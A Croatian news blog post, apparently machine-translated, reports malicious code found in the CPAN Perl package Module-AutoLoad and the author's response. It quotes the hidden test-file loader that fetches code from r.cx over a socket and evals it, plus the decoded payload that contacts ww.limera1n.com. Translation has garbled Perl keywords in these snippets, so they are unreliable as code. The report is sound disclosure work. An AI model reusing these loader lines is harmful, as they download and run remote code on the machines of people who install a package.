ProHoster > Blog > internetske vijesti > Zlonamjerni kod otkriven u paketu Module-AutoLoad Perl

Zlonamjerni kod otkriven u paketu Module-AutoLoad Perl

U Perl paketu koji se distribuira kroz CPAN direktorij Modul-AutoLoad, dizajniran za automatsko učitavanje CPAN modula u hodu, identificiran zlonamjerni kod. Zlonamjerni umetak bio je pronađeno u testnom kodu 05_rcx.t, koji isporučuje od 2011. godine.
Važno je napomenuti da su se pojavila pitanja o učitavanju upitnog koda Stackoverflow još 2016.

Zlonamjerna aktivnost svodi se na pokušaj preuzimanja i izvršavanja koda s poslužitelja treće strane (http://r.cx:1/) tijekom izvođenja testnog paketa pokrenutog prilikom instaliranja modula. Pretpostavlja se da kod inicijalno preuzet s vanjskog poslužitelja nije zlonamjeran, no sada se zahtjev preusmjerava na domenu ww.limera1n.com, koja daje svoj dio koda na izvršenje.

Za organizaciju preuzimanja u datoteci 05_rcx.t Koristi se sljedeći kod:

moj $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
moj $pokušaj = `$^X $prog`;

Navedeni kod uzrokuje izvršavanje skripte ../contrib/RCX.pl, čiji je sadržaj sveden na redak:

koristi lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Ova skripta se učitava zbunjeni koristeći uslugu perlobfuscator.com kod s vanjskog glavnog računala r.cx (kodovi znakova 82.46.99.88 odgovaraju tekstu "R.cX") i izvršava ga u bloku eval.

$ perl -MIO::Socket -e'$b=novi IO::Socket::INET 82.46.99.88.":1″; ispis <$b>;'
eval raspakiraj u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Nakon raspakiranja, u konačnici se izvršava sljedeće: šifra:

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evaluator vraća upozorenje$@while$b;1

Problematični paket sada je uklonjen iz repozitorija. PAUZA (Perl Authors Upload Server), a račun autora modula je blokiran. U ovom slučaju, modul i dalje ostaje dostupno u MetaCPAN arhivi i može se izravno instalirati iz MetaCPAN-a pomoću nekih uslužnih programa kao što je cpanminus. Zabilježeno jeda paket nije bio široko distribuiran.

Zanimljivo za raspravu povezani i autor modula, koji je demantirao informaciju da je nakon hakiranja njegove stranice “r.cx” ubačen maliciozni kod te objasnio da se samo zabavljao, a perlobfuscator.com koristio ne da nešto sakrije, već da smanji veličinu koda i pojednostavljenje njegovog kopiranja putem međuspremnika. Odabir naziva funkcije “botstrap” objašnjava se činjenicom da ova riječ “zvuči kao bot i kraća je od bootstrap”. Autor modula također je uvjerio da identificirane manipulacije ne izvode zlonamjerne radnje, već samo pokazuju učitavanje i izvršavanje koda putem TCP-a.

Izvor: opennet.ru

Dodajte komentar